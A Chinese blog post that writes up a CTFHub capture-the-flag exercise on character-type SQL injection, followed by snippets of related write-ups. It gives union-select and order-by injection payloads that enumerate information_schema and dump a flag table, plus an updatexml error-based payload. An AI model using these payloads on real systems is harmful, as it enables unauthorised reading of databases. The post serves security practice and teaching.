CTFhub 字符型注入

最新推荐文章于 2024-06-08 13:42:36 发布
最新推荐文章于 2024-06-08 13:42:36 发布
阅读量539 收藏 7
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/117961830
版权

字符型注入:

需要了解mysql的知识点:

union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符

和一些基本sql语法
和一些基本注释:
#,–空格,/* */

首先开启题目,知道这一题字符型注入,
所以存在引号,
于是利用引号和注释:
1’
1’ and 1=1#
1 and 1=2#
去测试是否有sql漏洞
得到:

在这里插入图片描述在这里插入图片描述

在这里插入图片描述
发现1’ 报错
和 1 and 1=1,回显
而1 and 1=2,没有回显
得出结论,执行了逻辑语句and ,所以有sql漏洞

所以构造语句,查看字段:
1’ order by 1#
1’ order by 2#
1’ order by 3#

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到3没有回显,所以只有两个字段

于是构造语句:
520’ union select 1,2#

在这里插入图片描述
发现有两个字段可以执行,于是构造语句
查看当前数据库:
520’ union select 1,database()#

在这里插入图片描述
在查看数据库内容:

520’ union select 1,group_concat(table_name) from
information_schema.tables where table_schema=‘sqli’ limit 1#

在这里插入图片描述
得到表flag ,查看表flag的字段:
520’ union select 1,group_concat(column_name) from
information_schema.columns where table_schema=‘sqli’
and table_name=‘flag’ limit 1#

在这里插入图片描述
得到字段,于是查看字段内容:

520’ union select 1,group_concat(flag) from sqli.flag limit 1#

在这里插入图片描述得到flag

南冥~
关注
CTFHUB-web-SQL注入
ookami6497的博客
11-29 856
CTFHUB SQL
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5565
Ctfhub解题 web SQL注入
CTFHUB——字符注入
陈艺秋的博客
01-14 537
sql整数注入
CTFHub字符注入
sGanYu
07-24 3181
目录 手动注入 sqlmap注入 手动注入 注入是否为字符注入,在输入id=1的时候发现输出结果为id=’1’,判断类字符串形 需要让语句闭合,正常执行,在url结尾输入%23 或者--+,正常闭合,%23为#,注释后面的语句,一定要注意“ ' ”英文输入下,否则容易爆错 判断列数,发现是两列 库名为sqli 爆出一个news和flag两个表,开始跑列名 列名为flag ,查询列内容 【 Mysql表类:在mysql内自带一个数据库,名...
CTFHub - 字符注入
Have_a_great_day的博客
09-08 837
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub-字符注入
m0_51589948的博客
05-19 256
字符注入 输入1,2,3 发现只有1,2回显,证明是一个两行的数据库 输入1 order 2 查询字段数 使用整形注入后发现,无法注入成功,考虑字符注入, 可得知数据库名为sqli 查询该数据库下的表名 -1‘ union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’# 得出表名有新闻和标志 查询flag的所有字段名 -1’ union s
CTFHub | 字符注入
尼泊罗河伯的博客
10-27 1566
此题目和上一题相似,一个是整数注入,一个是字符注入字符注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成。
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
ctfhub web全部做题记录(持续跟新)
01-08
分为整数字符注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件上传功能可被利用来上传恶意文件,如PHP后门。通过修改文件头,绕过前端验证...
CTFHub 字符SQL注入
Leon~博客
03-14 4312
字符SQL注入 目录 一、判断是否存在注入 二、判断select语句中有几列 三、判断显示的信息是第几列的信息 四、利用函数来收集数据库信息 五、通过union查询数据库 1、获取所有数据库名称 2、查询数据库中有多少个表 3、查询指定数据库中的表名 4、查询指定数据库指定表中的列名 5、查询指定...
CTFHUB 字符注入
qq_63875498的博客
12-04 226
CTFHUB 字符注入
CTFHUB-WEB-字符SQL注入
xixihahawuwu的博客
12-24 346
CTFHUB-WEB-字符SQL注入 我们先就这此题来了解下如何去判断是否是字符注入 如何去判断 1.加单引号,由于固定情况下,数据库此时的语句为select * from table where name = ‘admin’ ,加入单引号会引起报错,页面不回返 id=1' 2.加入 ?id=1' and 1=1 这里就需要加注释来进行绕过 一开始我想使用#来进行注释,结果发现被网页转码了,我们换一种注释–,为了防止再次被转码,我们在–后面加上+ id=1' and 1=1--+ 3.输入 id=
CTFHub笔记之技能树WEB-字符注入
weixin_48799157的博客
03-19 384
小白一个,如有错误还请各位大佬指正! 解法一:手搓 1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看 123' union select 1,database()# 2.发现目标 爆个表名看看 123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #' 3.发现名为flag的表 冲啦兄.
CTFHub (web-SQL-字符注入)
m0_64444909的博客
04-29 2620
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 阅读目录一、limit和group_concat查询的区别二、对字符数据的解释三、实战解题步骤1.进入靶场, 一、limit和group_concat查询的区别 1.列出所有数据库 limit 一个一个打印出来库名 group_concat 一次性全部显示 2.列出(数据库: )中所有的表名 limit 一个一个打印出来表名 group_concat 一次性全部显示 3.列出(数据库: 表:)中所有的字段名 limit 一个.
CTFHub-字符注入-wp
z1moq的博客
05-09 193
字符注入 输入1 数据正常返回 输入1+1 ​ 仍返回 ID=1 的值,说明不存在整数SQL注入漏洞 输入 ' or 1=1 # 能正常返回 ​ 所以存在以单引号闭合的字符注入 输入 1' order by 1 # 1' order by 2 # 1' order by 3 # 在值为3时无法正常显示页面 所以页面显示输出字段数为2 输入 -1' union select 1,database() # 获取数据库名 继续输入 -1' union sel
CTFHub:web前置技能-SQL注入-整数注入
最新发布
wdnmddbl的博客
06-08 811
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:sqlmap下载点我文章总结有我个人总结的一些知识点,希望对你有所帮助。大概思路和涉及的知识点sql注入基本语句和手工注入流程:#,–+,-- -代表后边忽略,常用与闭合思路:sql注入之数字注入点:许多网页链接有类似的结构。
CTFHUB-WEB-SQL注入-字符注入
weixin_43486981的博客
08-10 491
题目: 靶机环境: 输入1查看显示,1被单引号引起来了 使用单引号’,提前闭合字符 求列数 求数据库名 求数据表名 求字段名 求字段值,得到flag
i 春秋 CTF训练营 web——SQL注入 1(字符注入)(手动注入
AAAAAAAAAAAA66的博客
11-30 2590
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
CTFHUB-SQL注入-字符注入
u014794539的博客
07-09 338
考点字符SQL注入 分析过程 先输入个1 因为是字符注入 一般先判断是否存在注入点 加单引号后变成三个单引号,则无法执行 playload: ?id='1'' playload: ’and 1=1 也不行 playload: ' and 1=1 --' 可以成功执行 playload: 'and 1=2 --' 报错 然后判断列数 playload: id='1' order by 3 -- '' id='1' order by 2 -- '' 3时无回显则字段数量为2 查询是第
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值